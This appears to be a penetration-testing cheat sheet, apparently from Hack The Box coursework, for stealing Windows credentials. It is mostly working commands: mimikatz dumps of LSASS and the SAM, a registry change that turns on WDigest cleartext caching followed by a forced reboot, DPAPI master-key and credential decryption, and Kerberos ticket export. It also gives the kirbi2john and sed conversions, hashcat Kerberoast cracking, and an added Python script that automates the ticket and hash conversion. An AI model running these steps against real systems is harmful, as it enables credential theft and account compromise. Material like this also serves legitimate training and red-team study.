mimikatz
privilege::debug
- dump the credentials LSASS holds for every logon session (NTLM hashes, Kerberos keys, and WDigest cleartext where it is still enabled)
sekurlsa::logonpasswords
If the WDigest Password field shows (null), cleartext caching is disabled (the default since Windows 8.1 / Server 2012 R2); enable it
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
- to check
reg query "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential
- only logons that happen after the change are cached in cleartext, so restart the system (or wait for the users to log on again) and re-run sekurlsa::logonpasswords
shutdown /r /t 0 /f
DPAPI
to decrypt the user's master key (/rpc asks the DC to unwrap it with the domain backup key, so this has to run in the context of the user who owns the key)
.\mimikatz.exe "dpapi::masterkey /in:C:\users\ppotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc" exit
to decrypt a credential blob with the master key (the /masterkey value is the key dpapi::masterkey printed above)
.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\18A1927A997A794B65E9849883AC3F3E /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit
Extracting Tickets from Memory with Mimikatz
- start a logfile so the base64 blob can be copied out of mimikatz.log afterwards
mimikatz # log
Using 'mimikatz.log' for logfile : OK
- print exported tickets as base64 in the output instead of writing .kirbi files to disk
mimikatz # base64 /out:true
isBase64InterceptInput is false
isBase64InterceptOutput is true
- list and export the tickets of the current logon session (service tickets, TGS, are the ones worth cracking offline)
mimikatz # kerberos::list /export
Preparing the Base64 Blob for Cracking (the log wraps the blob over several lines; strip the newlines before decoding)
AnuragTaparia@htb[/htb]$ echo "<base64 blob>" | tr -d \\n > encoded_file
Placing the Output into a File as .kirbi
AnuragTaparia@htb[/htb]$ cat encoded_file | base64 -d > sqldev.kirbi
Next, we can use the kirbi2john.py tool (from the John the Ripper repository; it needs Python 2) to extract the encrypted part of the TGS from the .kirbi file.
Extracting the Kerberos Ticket using kirbi2john.py
AnuragTaparia@htb[/htb]$ python2.7 kirbi2john.py sqldev.kirbi
This will create a file called crack_file in john format ($krb5tgs$<name>:<checksum>$<encrypted data>). We then must modify the file a bit to be able to use Hashcat against the hash.
Modifying crack_file for Hashcat (rewrites each line to $krb5tgs$23$*<name>*$<checksum>$<encrypted data>)
AnuragTaparia@htb[/htb]$ sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
Cracking the Hash with Hashcat (mode 13100 = Kerberos 5 TGS-REP etype 23, RC4-HMAC; AES tickets, etype 17/18, use modes 19600/19700 with a different hash format)
AnuragTaparia@htb[/htb]$ hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt
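The two conversions above (log blob to .kirbi, crack_file to hashcat format) as one script with the sanity checks the shell one-liners skip. This is an added example, not code from the page, from mimikatz or from the John/hashcat projects: it assumes kirbi2john.py emits $krb5tgs$<name>:<checksum>$<encrypted data> (the shape the sed line above rewrites), checks that the decoded blob really starts with the DER tag of a KRB-CRED (0x76) before anything is written to disk, and only accepts a 32-hex-char checksum, which is what mode 13100 expects. SAMPLE_KIRBI and SAMPLE_BLOB are constructed stand-ins, not a real ticket.

```python
import base64
import re
import textwrap

# DER tag byte of KRB-CRED ::= [APPLICATION 22], i.e. the first byte of every .kirbi file.
KIRBI_TAG = 0x76

# Constructed stand-in for a .kirbi (assumption, not a real ticket): only the leading
# tag byte matters for the check below, the rest is filler.
SAMPLE_KIRBI = bytes.fromhex("7606300402010502")

# Constructed stand-in for what "base64 /out:true" leaves in mimikatz.log:
# the blob wrapped over several CRLF-terminated lines.
SAMPLE_BLOB = "\r\n".join(textwrap.wrap(base64.b64encode(SAMPLE_KIRBI).decode(), 4))


def is_kirbi(data: bytes) -> bool:
    """True if the bytes start like a DER-encoded KRB-CRED (a .kirbi)."""
    return len(data) > 0 and data[0] == KIRBI_TAG


def decode_blob(blob: str) -> bytes:
    """Same as `tr -d '\\n' | base64 -d`, plus a check that the result is a .kirbi."""
    cleaned = re.sub(r"\s+", "", blob)          # drop CR/LF and any pasted indentation
    data = base64.b64decode(cleaned, validate=True)
    if not is_kirbi(data):
        raise ValueError("decoded data does not start with the KRB-CRED tag 0x76; wrong blob copied?")
    return data


# kirbi2john.py line: $krb5tgs$<name>:<16-byte checksum as 32 hex>$<encrypted ticket hex>
JOHN_RE = re.compile(
    r"^\$krb5tgs\$(?P<name>[^:]+):(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)


def john_to_hashcat(line: str) -> str:
    """Rewrite one kirbi2john.py line into hashcat mode 13100 format, like the sed one-liner.

    The fixed "23" assumes an RC4-HMAC (etype 23) ticket; AES tickets need other modes.
    """
    m = JOHN_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$<name>:<checksum>$<edata> line (checksum must be 32 hex chars)")
    return f"$krb5tgs$23$*{m['name']}*${m['checksum']}${m['edata']}"


def convert_file(src: str, dst: str) -> int:
    """Convert every non-empty line of crack_file into dst; returns the number of hashes written."""
    written = 0
    with open(src) as fin, open(dst, "w") as fout:
        for raw in fin:
            if raw.strip():
                fout.write(john_to_hashcat(raw) + "\n")
                written += 1
    return written


if __name__ == "__main__":
    # Usage on a real engagement: paste the blob from mimikatz.log into decode_blob(),
    # write the bytes to sqldev.kirbi, run kirbi2john.py, then convert_file("crack_file", "sqldev_tgs_hashcat").
    kirbi = decode_blob(SAMPLE_BLOB)
    print(f"decoded {len(kirbi)} bytes, KRB-CRED tag ok")
    print(john_to_hashcat("$krb5tgs$sqldev:" + "0" * 32 + "$" + "ff" * 8))
```

Feed the output file to hashcat exactly as on the page (-m 13100). If decode_blob raises, the copied text was not the ticket blob (usually a line of the log was missed or an extra one was included).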
If the interactive mimikatz prompt hangs or keeps looping (typical in a reverse shell without a proper console)
use the non-interactive form, passing the commands on the command line and ending with exit
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
SAM Dump (NTLM hashes of the local accounts; reading the SAM hive needs SYSTEM, so run privilege::debug and token::elevate first)
lsadump::sam